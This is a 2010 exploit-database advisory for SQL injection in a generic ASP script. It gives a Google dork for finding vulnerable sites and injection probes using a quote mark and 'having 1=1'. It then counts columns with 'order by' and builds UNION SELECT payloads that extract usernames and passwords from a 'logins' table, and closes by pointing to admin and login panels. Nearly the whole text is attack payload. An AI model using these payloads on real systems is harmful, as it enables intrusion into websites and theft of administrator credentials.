کد:
=============================================
ASP Exploitation SQL Injection Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#######################################################################
#
# Exploit Title: [ ASP Exploitation SQL Injection Vulnerability ] ..
#
# Date: [ 2010-06-17 ] ..
#
# Author: [ SUp3r00t - heShAm_HaCkEr ] ..
#
# Version: [ Scripts((asp)) ] ..
#
# Google dork: [ show_file.asp?num= ] ..
#
# TeaM: [ T.v.T ((http://www.pro1tv.com)) ] ..
#
# From: Saudi Arabia ..
#
# Gr33t's: The Master|Al-Kaser20|T.v.T
#
#category: [SQL Injecti0n] ..
#
#######################################################################
# Exploit :
http://[site]/path/show_file.asp?num={SQL}
# Analysis:
http://[site]/path/show_file.asp?num=Number
union select ((Number)) login, ((Number)) from logins
========================================================================
# Like:
http://[site]/path/show_file.asp?num=50
http://[site]/path/show_file.asp?num=50'
http://[site]/path/show_file.asp?num=50 having 1=1
((')) <<<<< Keep the label to show a query site involved ..
(( having 1=1 )) << Yes, this revealed the site involved ..
========================================================================
# Like:1
http://[site]/path/show_file.asp?num=50 order by 20
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from logins
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,name,19,20 from logins
union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,18,19,20 from logins
========================================================================
# Final:
http://[site]/path/show_file.asp?num=-50 union select 1,2,3,4,5,6,7,8,9,10,11,12,password,14,15,16,17,name,19,20 from logins
The source of plaque control:-
http://[site]/path/admin "OR" http://[site]/path/login
cpanel: http://[site]/admin "OR" http://[site]/login
========================================================================
./ Sup3r00t@gmail.com
./ pro1tv.com